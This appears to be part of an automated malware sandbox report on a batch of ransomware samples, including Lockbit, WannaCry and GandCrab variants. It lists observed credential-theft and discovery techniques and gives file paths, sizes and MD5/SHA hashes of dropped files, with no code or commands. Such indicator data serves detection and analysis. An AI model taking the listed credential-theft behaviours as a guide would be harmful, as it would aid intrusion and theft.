6Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Network Service Discovery
1Network Share Discovery
1Peripheral Device Discovery
2Query Registry
4Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5524f89eecca9dc38902d3b9e9f58f445
SHA14c2beddf7c3eb4c81f38e1c2a0ff82d80bdc1055
SHA2561482e3fba2b16e4af4390b633da0972ab29ca8b9f28842ed42246c9d20c77eb1
SHA512c43c3a2e683b5aed7a5aa824f9aa0b69f847e7297df898de97787fc8a25fce70578aaff5c6844263230cdddd759901f3efb4442be9f91664a5f66379f1b63aa7
-
Filesize
272KB
MD55638c3651767b7bb8245754e937074a2
SHA1acdaba11b1fe0748a57e54ae0ab6073c396f7aaa
SHA2561d8dd7e85a3c538c8c9e55b6a01cd453aa24983b0f9ee2ee5587d38a66cdeff1
SHA512e94aafdbade634af8962066479de5fe52ae24a2d11b46d660b1822e6c09b096c6d688aac84641a5be33ce0c0b5a9173a3bca5dece149fc08b6f47c6ec54fd5d4
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD59d082d40e98fa9c786143088a4e8907d
SHA1037fb1e7fe62218b5069aab8a4df5ea6bacb6ec1
SHA256228f2d94523d6fb4b4e3a522e40f3b714d438a3a4480b5a1f5b8d114df3e553b
SHA5124fb7bd76726f51e9389a7daa491039d422201a5a8760fb1e0f2cf2063e6dceb50300e5b30c484d370fc93d3db58004267b87f71efad649504b5e73c4d8b348d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD55265a9b51e0ec52d3a87ee4141abbe28
SHA19e80727bf99c0e6f78c1c52e64e2b198c16ec2a1
SHA256b9d323c31879c6265f68de8de62f2c259a376bc79a5772d7daa9e7ef61c45183
SHA5123ffe89e4706011d655dee76a042b0cb7c90949b1838207ab3280e72ad384c1db4ee85ca83d52da15a3a43f277b710973b0d3d04135e8fe349f6bf18460be0a28
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
89KB
MD5b3be26d272a56c122b3313746499a33e
SHA16d5b5d2d2da7b8683d8dffd5e770ba5b7e6c95d7
SHA256ede4aeb373e2fb96ff63239232d2fbc6c1c4c6b5b1a606f67e8236535bf478da
SHA51203dccefc6f5ac0386a11d05d848cfaa76dfa495cdaf0b6ab0d34c1333dd389960f93fb700c1638eb385814a7c0462b6a353965bc7e053ac27a411fc30114f91e
-
Filesize
833KB
MD59ac2d2c1df56dd78d4f8183dc233e686
SHA117664b6c0062cd619aeef4f920000500cd8401ac
SHA256b69ba5515cfd5fc5fb687fde0f8ee2b1385f0a58d86b7b5e91ef5a4763f309d9
SHA5128d29e3a7c666d4acf8a8e87861529862c6af59c3d233fe60881d9493522806f276fdeb0fbe928ddbc2f3e55dc978a3b410c75113687ce3d32a918b1fcd05c220
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe
Filesize1.9MB
MD56d92d64fbf2708ff6d6419eb6f0a6498
SHA1296641f6bfe7fb36df350ffe1b8a4f8452ea8317
SHA256404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885
SHA51204b796f217fca1e770c44e09a2aa18b5e502c05ad729b66fe0d9307325e517971fdc9b8cb7a3d0ec306371a9214d41dcf68178ff76e7b544665913c668f7a238
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exe
Filesize114KB
MD52b793d5c9272f880bd2ae2e33416c7d6
SHA1a20419a11498e9b2839d5007c42cf60109d53146
SHA2566d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44
SHA512ca480366ccd899a37eff604635b7c096abfe6dd949d471501a3dbe094b29dabdeca90a9dd165a1a4c5c3319b6700b3ae08da8dbd1a9ab2d42f14ac1ce366d62f
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe
Filesize3.4MB
MD56704fc0d789f4dba7a654ca7df2b11f4
SHA14ea1f3fd59c1f5c6e8ef9eeaecf31a4c92afda74
SHA256fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48
SHA5129dec198b1e90a4b98d157c8fa888daf36bf4c4f4e3011d47af56a4e257c40bc88d29cd8f3436b5f1ee1663421fe3dbaf4334a1affeadeefdd64762216c830a3c
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe
Filesize122KB
MD5b4d5fd84ae9a7813ed428517d5773ed7
SHA1863d7d3a22e17464fa0a56300a2645c88ed930b7
SHA256a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682
SHA51284dd867735dcc54f84ab6d3bd7f1729ded4ca7563b44b9547689057e057ecbb75e44c17ae0868aff7e56bddc271293d801487d3031b33c19ebea9313025dd24c
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exe
Filesize9.3MB
MD58d62bd2846deb7bb49405e872e9804ed
SHA183a147d4ff0f92cf67a2271a7f78895db463330d
SHA256a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc
SHA512154a7c1fb25cb4fdf01dd8c862aba564ccddadb8d7334334ebc3ce8383534eca1ed98c8dd5cc799153185d1856ae82955697b919a5488ec9852a6432e1912ab9
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exe
Filesize604KB
MD50a5b3d2c6105fa66a80a6a700822a42b
SHA161c81d0704c32312d746233578508190c22f86f7
SHA256581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163
SHA512907e48498109265d2f1d4760c77dacbeeb053408e088c485258ed5050d0be3339195370fea4df703feeeadab697633aaf841ea3d3fd83b8f62ef83338f6fd001
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exe
Filesize322KB
MD55b9d26ae49cc9122da07cd721788098d
SHA1700e4e5b508fb20d82a387f744bb3adf2981c537
SHA256612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545
SHA512e972e0e37f032776e46f3b0a9de7965012d7b1bf41553c0cb73756d67ed3402183e42911e2ba5cd408c1c621715b773413c966a8bed9097342e972196343ab64
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe
Filesize58KB
MD5be3e139ee678b11e436dc6273a7e33e9
SHA1c0ef67c300e57684657f0a13e5ccd88450adcc96
SHA256666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538
SHA51243dee9ccfd737733b738207ec850291f23422760577770a2729aa002131037dedd1ef66fc0cc7d4fe3cb46ae379ef66f7de6a77facbcd4f5c7b769ffc9d9814c
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe
Filesize146KB
MD510b3fd3c861d5cf657934c89260590ab
SHA17f34253a70c74ab3059714ff8de44de89609803c
SHA256ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30
SHA512a01f7dde1ddd9e23c5c0d94ef8755eace5493f27dd173f4b3fde38411319c683d05d06cf30fea235c909fb9f3e4f80089bd2249a3f99a637305afd7f849758d9
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
Filesize874KB
MD52e0d1b3698ec45dd59526a5f72aeb6f7
SHA1abf0bb60c60af61fb03b5f136760b6ff9ac3d48a
SHA256f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594
SHA51290fa337309b897e2887f934cc1f1f26c2aa8b6e7e06a39d493490331243776a3dccb671b0aa236583f2ccc8328b289f0fdb252fd0b14686d3541baf42c79979f
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Filesize272KB
MD5c5bf915e6a2dac2d03b3bf43c7e0d774
SHA1829be27536921de8feb3c7b31a02ffc1ab6557cf
SHA25666b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0
SHA512c15e7a83ad49bcaef6a7668bbd8173a0d82687dd461d25a6810cf7a180fa3478aa723371e9516714f72325591ec30767330ff7cb5688336bd365e77f436d56fa
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exe
Filesize851KB
MD54cd6ac6a04eb5234757e84ebf401caf7
SHA15d067a5e54033f84535a768a3a93539143c65b44
SHA256d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51
SHA512efee3e3fa185340bccb914e967f7d4d419607e3364228e9f4524d1626b9b3f790ea4322cd3789fe59cfd0d0073529b8a2f18804859759469e30e131fedf475ba
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe
Filesize196KB
MD55c1ad0318b0dc5f608b03ed3be1a18b7
SHA14b2f8f01b11c64673cb9ab970e157ac23223df4e
SHA256247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960
SHA512b2a31dbe5a8612688a9bf4c1650c90498da8cc11c10dff6fa49a9bdade47975f222bdf6b72a9445000d50f60217f6a193fb05ec06e7893af212cc5d7c78771e0
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Foreign.xqx-ad99d1d265eb64a2b40fbc6f4a1118877001ff0724152c8fea243c7a5e833fc5.exe
Filesize3.2MB
MD52b4a41caee2ecd45273778951b602085
SHA1c74176c0c25e29c385937ed89d81b6728816f17d
SHA256ad99d1d265eb64a2b40fbc6f4a1118877001ff0724152c8fea243c7a5e833fc5
SHA512a730014810a71a03a12d32eda4abccc15575c9f1436baf694e77df8c3c7d48a2b5e8b8a88ac95a9d684ad212d8ccd99803e7a97b0ec736bfe14ea89561a6591f
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe
Filesize1.1MB
MD552a3eff0de2c6305c3639f1718c94c98
SHA1affca8d7d8ee7882ce36ae3be6f42b298b07903f
SHA2569e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466
SHA5126eadd1fa06ecd08e80304eb15b4f8e9c23261ee006994e216c298d158eeea76fb8d46abeb3c2f95b35ab146c2af39dd51d0b6a0a1d8bf4d85b5ac75561612035
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe
Filesize89KB
MD575edc0a5978219e8f6f7dff68d5425f1
SHA19a073f81da7e7c1260fcd4d0c9982822a8162547
SHA25644be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4
SHA5126acc26581cd05272231450cb2034c57d088815b654fef12a22c4aba52b0b83fe9e633f6b8d478816d12d87a783a77222594ddf83a7928b15a0d097c4e9e60d1b
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe
Filesize2.0MB
MD51e417085ae5bb12cc7cab4708c3a6301
SHA1ba6f56ecb5a1e73b5f9566079c5936ed70b1f1b3
SHA2565dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9
SHA512b95e57d3c4c3ea3e0bf93c155f34ca8f89f20ad421c11a4e4906c7d7fc10e78398548e1ab899f1426202038d1fa58d9d6c04fc94ba3c55f04abb6f3b4c3b4853
-
Filesize
86KB
MD5ed07699cfbcfbe8cc883f62bc67d21f1
SHA1625d25245cb53712fda368a51e0b300e0e773bfa
SHA2566afa4827ef5030e24ce9bc7887749c3522a164fd9971cb1a99cedc53769201a9
SHA5121b4f054b4c00f5bf10bdd0a72224fb1b69710126ce80e0657924ba480c9fc148d799a690d6f439e39c8ac3eb236bf1e8cd17636c703bf8fcb4d957d24efd5139
-
Filesize
272KB
MD5882e42f52d28a99ddb1938be714d323d
SHA15efe12e06d431dd56df471e9bce3ec40a1b2af2e
SHA256c18940f0625571fc9940485a44d723d4cc8052a154dfce9506025413ce8e9f05
SHA51251410899ca6dc1d4438a613fab2386fe05624b88fa0815761bcf338679192d2b5e883a4c5aca1a16a49a42b40d98ee7a8fef915adf4c374a97fe8826c077f980
-
Filesize
272KB
MD58925a3dd0897dd5b9c6bb4fa1bf8f18c
SHA113e6bf0b80347e756cb6583be561b59fe977b554
SHA256b2c48519d4aef1845d7d4f9d7f021e2b6d12d8d64253161a812d9bbd853e4977
SHA512c90d137f44d82a5bc807f682f35309bdbd5858ffa8c6d5cc31f7a1abb0576d727967b0ec483d7e1fce2455e89df68c6890481b40df9f37339115fff3ebd470a4
-
Filesize
272KB
MD5ec1639d817868f02100d14a164070e49
SHA147921ac66050a04c17ed07803bd33c162f9ff467
SHA256675f8327b34ce8007cdf61d53ef6470e595f061c3964299bc0a8eb9a1c4a94b7
SHA512840c9baafe8c96faea516c7c0a9b94fb6d80aa0fa51307045f661f3cf4420f6a8f44432c8015e37016a54ac711933d51f7c8d5e7084a4863179f122ef9893cd5
-
Filesize
272KB
MD5e7e428bd0477b1edaaa610c2f2e23a0f
SHA1c235f60fabcc52c8190f6be09fe0458740706c81
SHA256a14e7695460243625cb5ec1c58208f929b5201c96a63231ddca3ec2ae883d7fc
SHA512206d14c3dc7d99199cc31e934899e79e51e100ac838702db747e9ff80c847ac29b886f9cd2f9dafdf5975405b66d090dd8b8c7e2004fba7c05ec6fd7b75f92cb
-
Filesize
272KB
MD5b785ce21bea2dd8ec2da499b806dffd6
SHA10d98f35b2cde807564b8d89277bd39615008c871
SHA256f61fa76157c70b2551e9413fc6d14ee867f927b9bc0435da8327a6618b993314
SHA512ce4791a52b6eaedf5466d3164c55033fbd6819ca8f6dffc35af45a97727a318224854813506e5c6245c5a4df8ca01d84548000f84fb23057c7f8f171fa574bc8
-
Filesize
272KB
MD5282a54a9a4317c57c25921c92a82d0f1
SHA1a16dbb8fab33b5f1756c705b894248705bbcbeb4
SHA25660cba8e475b8ca2aef34b80a9abf85fdfbc28bc4acd988dd50d15c0ad1bf15ca
SHA5124f3abd0bd2b94d160051ea33078a4c8e05f305d68128de06f0436845b999a7023b8238d31737ff3f626f353b0a6cdd174d3ff058f3bb51a0d090407235f69a22
-
Filesize
272KB
MD596cca09902ae4ed97c5525fce57990f2
SHA14297fdee57ddc726a3ed8c1cba0fa980f7f97977
SHA256af013c172071529d1880c6e1c4a9f7fbfcefae7ba11d62d35f03f1bb4e1071c9
SHA512fc8f3b47ac4632521cc86f4ebdb0b7cb462af9f935cc97db8cf88f1496f3e5058527492893ad55be99a8e38404bf955fe83ae5867118549e5d7428edeb2ad1c2
-
Filesize
640B
MD55d142e7978321fde49abd9a068b64d97
SHA170020fcf7f3d6dafb6c8cd7a55395196a487bef4
SHA256fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061
SHA5122351284652a9a1b35006baf4727a85199406e464ac33cb4701a6182e1076aaff022c227dbe4ad6e916eba15ebad08b10719a8e86d5a0f89844a163a7d4a7bbf9
-
Filesize
217B
MD5c00d8433fe598abff197e690231531e0
SHA14f6b87a4327ff5343e9e87275d505b9f145a7e42
SHA25652fb776a91b260bf196016ecb195550cdd9084058fe7b4dd3fe2d4fda1b6470e
SHA512a71523ec2bd711e381a37baabd89517dff6c6530a435f4382b7f4056f98aff5d6014e85ce3b79bd1f02fdd6adc925cd3fc051752c1069e9eb511a465cd9908e1